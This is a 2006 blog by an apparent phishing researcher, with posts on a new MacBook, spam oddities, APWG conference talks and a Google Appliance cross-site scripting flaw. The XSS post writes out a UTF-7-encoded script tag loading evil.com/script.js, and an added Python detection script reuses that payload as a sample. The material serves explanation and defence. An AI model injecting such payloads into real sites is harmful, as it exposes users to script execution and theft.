Thursday, November 30, 2006

the macbook cometh

Here's the previous post in comic form. Comic Life is pretty darn cool.

new toy

On the 27th I ordered a new toy from Apple, well, okay, it's a computer so thus a tool for my research. I figured since I was buying a new laptop, I should go all out and get dongles for it too; it's important to be able to hook it to a monitor, projector or TV, so I bought an S-Video, a DVI, and a VGA dongle to plug into it. Funny thing, they arrived two days ago.

So needless to say, last night I was anxious for it to show up. FedEx was shipping it from China, and I had been following it on its travel through Alaska. When I went to bed, it was still en route from Alaska. FedEx woke me up at 8:30 by pounding the hell out of my door, and there it was! Incredibly fast. Go FedEx.

Anyhow, I'm as always infatuated with Apple's packages, so I slowly opened the sucker, marveling at how they used a thick shipping box with only corner foam pieces to kind of minimize waste. (They have been getting lots of flak recently about being harmful to Ms. Earth.) Anyhow, inside the brown box was a really pretty marketing box that mostly shows off their presentation abilities.

Tearing through the tape, I pulled all the stuff out of the box noticing a new flavor of foam: it looked waffley. Stamped on the foam too was the MacBook logo. I still think it's odd that Apple goes through the trouble to make things so pretty when people will only see them once. Maybe it's for geeks like me who enjoy opening boxes way too much.

Box drooling aside (not quite as cool as the original cube iPod boxes), I pulled out my new workhorse and opened it up. I really like this new magnetic latch. One of my peeves about the 12" PowerBook is the flimsy latch.

Of course the best thing about the way Apple ships their laptops is the full battery. I've never seen instructions packaged with any battery-powered Apple product that says "plug in for charging before first use" or even "go buy a battery." They take good care of their customers -- cell phone manufacturers could take a hint from them.

Anyway, all things in order, I've set up the new MacBook just the way I want it, and am constantly being impressed by little things. For example:

  • During initial setup, you pick an image to represent your account. The software turned on the built-in iSight camera and let me take a photo of me (bed head and all)!

  • Emacs compiled in 10 minutes (took over an hour on my old PowerBook).

  • Target Disk mode rocks! I used my old laptop as an external FireWire hard disk to transfer all my documents and settings. Couldn't have been easier.

  • Third-party software, including games, was pre-installed. This included a Mancala game. I didn't know Mancala was even popular.



There's lots of software that looks fun, including ComicLife... maybe I'll post a comic strip later.

spammers concerned with fraud

It appears that some spammers are concerned with phishing and pharming attacks that will make it harder for people to find the real source of Viagra. To fight this, some spammers are telling people to actually type the URL into the browser, and not follow links in the email.

Honestly! You're at the bottom of the authority chain, you're a spammer. Just use a link.

(Link to a screengrab of the email)

Wednesday, November 29, 2006

google appliance xss

Multiple sources have been reporting a Google Appliance XSS attack. In short, the attack allows someone to tweak the variables sent to a search page in a way that lets arbitrary scripts from any domain be executed on the results page.

Say I do a search at IU's search page, and when the results are shown to me I am directed to this URL:
http://search.iu.edu/search?q=thing&output=xml_no_dtd&oe=UTF-8&...

I can change the q and oe variables such that the q variable has <script src="evil.com/script.js"></script> encoded in UTF-7, and then set oe to UTF-7 so the q variable is decoded. Then when the results are shown, evil.com/script.js is loaded on the page.

This has been shown to manipulate the results page (see this example), but since the URL must be modified, and a search query must have already been submitted, I don't see an immediate use for this.

I guess one thing that could be done is as follows: an attacker could create a custom search portal that ignores the search terms provided by a user, then executes some JavaScript to screw with their computer. Of course, they must be initially directed to the evil search portal... is there another use for this "vulnerability" that escapes me?
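The charset switch described above is easy to spot from the request side. The following is an added example (not from the original post or from Google) of a log-review check that flags a non-allowlisted oe and decodes q with the declared charset before looking for tags; the host name, the allowlist and the sample request URLs are constructed for illustration.

```python
import codecs
import re
from urllib.parse import parse_qs, quote, urlsplit

# Output encodings the search front end is expected to accept; a request that
# declares anything else (UTF-7 in particular) is suspicious on its own.
ALLOWED_ENCODINGS = {"utf-8", "iso-8859-1"}

# Tags worth flagging once the query has been decoded with the declared charset.
TAG_RE = re.compile(r"<\s*/?\s*(script|iframe|img|svg|object|embed)\b", re.I)

def decode_as_declared(q, oe):
    """Decode q the way a results page honouring oe would, or return it unchanged."""
    try:
        codecs.lookup(oe)
        return q.encode("utf-8").decode(oe, "ignore")
    except (LookupError, UnicodeError):
        return q

def inspect_request(url):
    """Return a list of findings for one search-request URL; [] means clean."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    oe = params.get("oe", ["utf-8"])[0].strip().lower()
    q = params.get("q", [""])[0]
    findings = []
    if oe not in ALLOWED_ENCODINGS:
        findings.append(f"output encoding not allowlisted: {oe}")
    # Check both the raw query and its charset-decoded form.
    if TAG_RE.search(q) or TAG_RE.search(decode_as_declared(q, oe)):
        findings.append("html tag in query after charset decoding")
    return findings

# Constructed sample request URLs (not real log data, hypothetical host). The
# hostile one carries the script tag from the post, UTF-7 encoded and then
# percent-encoded as it would appear in a request line, with oe set to UTF-7.
UTF7_PAYLOAD = '<script src="evil.com/script.js"></script>'.encode("utf-7").decode("ascii")
SAMPLE_REQUESTS = {
    "benign": "http://search.example.edu/search?q=thing&output=xml_no_dtd&oe=UTF-8",
    "charset_switch_only": "http://search.example.edu/search?q=thing&oe=UTF-7",
    "utf7_xss": "http://search.example.edu/search?q=" + quote(UTF7_PAYLOAD) + "&output=xml_no_dtd&oe=UTF-7",
}

def scan(requests):
    """Map each sample name to its findings, as a log-review pass would."""
    return {name: inspect_request(url) for name, url in requests.items()}

if __name__ == "__main__":
    for name, findings in scan(SAMPLE_REQUESTS).items():
        print(f"{name}: {findings or 'clean'}")
```

Rejecting a non-allowlisted oe before rendering is the server-side fix; the decode step is there so a log review still catches payloads that a permissive front end would have honoured.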

Monday, November 20, 2006

powered by the Microsoft

I got an interesting spam today that said I won the Microsoft Lottery (the UK Microsoft Lottery). It was your usual email, except I'm sure its performance was much better; there was a tag at the bottom that said:
this is powered by the Microsoft®

Friday, November 17, 2006

apwg: day 2, law and enforcement

Today was mostly geared towards law enforcement and legal arguments about how and why phishing (and other electronic fraud) is difficult to catch.


Stanley W. Crowder (Special Agent, US Secret Service)
Mr. Crowder talked about how the USSS investigates phishing to help find people, stop them, and generally protect consumers. He mentioned that there are lots of carding websites used for fraud. Also, there is a tremendous underground culture (or market) centered around stealing and using identity for financial gain. Take-home message: Law enforcement needs help breaking through the technological barriers to catch bad guys.

Michael Levin (Dep. Dir. National Cyber Security Division, DHS)
Agent Levin gave a little insight about how his division at the DHS operates. It appeared to me that his emphasis was on DHS's main aim, which is to get different communities talking to each other (intelligence, academia, law enforcement). He believes all police should be equally well trained on cybercrime so they can help collect and identify digital evidence when they visit a crime scene. He also believes in establishing good relations between US feds and other countries' federal cops by "drinkin' beer or drinkin' vodka or wrestlin' with 'em" -- whatever it takes.

DHS interacts with the public via CyberCop. You can register for the CyberCop portal and obtain a weekly newsletter called "unusual suspects" sharing some sort of interesting information (don't know what).

odd spam



Today I got spam consisting of a lot of random numbers chosen and formatted to spell out a domain name. Click the above picture to see the whole email. Kind of weird. Anyone else seen anything like this?

Update (17-Nov 12:17): It appears to be a very cryptic pump and dump scam. See the stock ticker on Yahoo.

Thursday, November 16, 2006

apwg: Sven Karge

Sven Karge talked about legal implications of phishing in Germany. There were lots of subjective details, but in short, be really really careful if you fly through Germany after doing anti-phishing studies where you simulate sending phishy emails. There are lots of issues with copyright infringement, though the laws he presented seemed pretty fair -- criminal intent is important to prosecute. He also suggested ways to improve tracking and shut-down of international phishing operations:
"To prosecute, we need good international cooperation."
This includes well-established and court-approved evidence sharing procedures so we can prosecute phishers in international courts.